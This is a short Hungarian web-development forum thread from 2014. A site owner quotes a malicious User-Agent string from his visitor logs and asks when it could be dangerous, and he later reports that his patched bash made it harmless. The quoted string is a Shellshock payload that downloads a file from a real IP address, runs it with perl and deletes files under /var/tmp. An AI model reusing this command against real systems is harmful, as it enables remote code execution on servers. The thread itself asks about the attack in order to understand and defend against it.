ugrás a tartalomhoz

USER_AGENT exploit?

tacsiazuma · 2014. Okt. 3. (P), 00.14
A weboldalamon a látogatói statisztikákat egy adatbázisban tárolom, ahol puszta kíváncsiságból bedobtam egy useragent oszlopot is, ami értelemszerűen a $_SERVER['USER_AGENT'] változó értékét kapja meg (szerencsére az admin panel sehol nem iratja ki ezt). Ahogy nézegettem az adatokat, ezt találtam köztük:
() { :;}; /bin/bash -c "wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/
Annyira rájöttem, hogy a kis hamis letöltene valami fájlt az adott IP-ről, aztán azt lefuttatná perl-el és eltakarítaná a nyomait.

Az egyértelmű, hogy nem jó szándékkal tenné, viszont az érdekelne, hogy mely esetekben fordulhat elő, hogy shell scriptben futtassak le USER_AGENT-et? Mikor jelent ez veszélyt?
 
1

Szomszédos téma

vbence · 2014. Okt. 3. (P), 00.27
2

Köszi

tacsiazuma · 2014. Okt. 3. (P), 14.51
Köszi a segítséget, a probléma már tárgytalan, szerencsére naprakész volt a bash frissítésem :)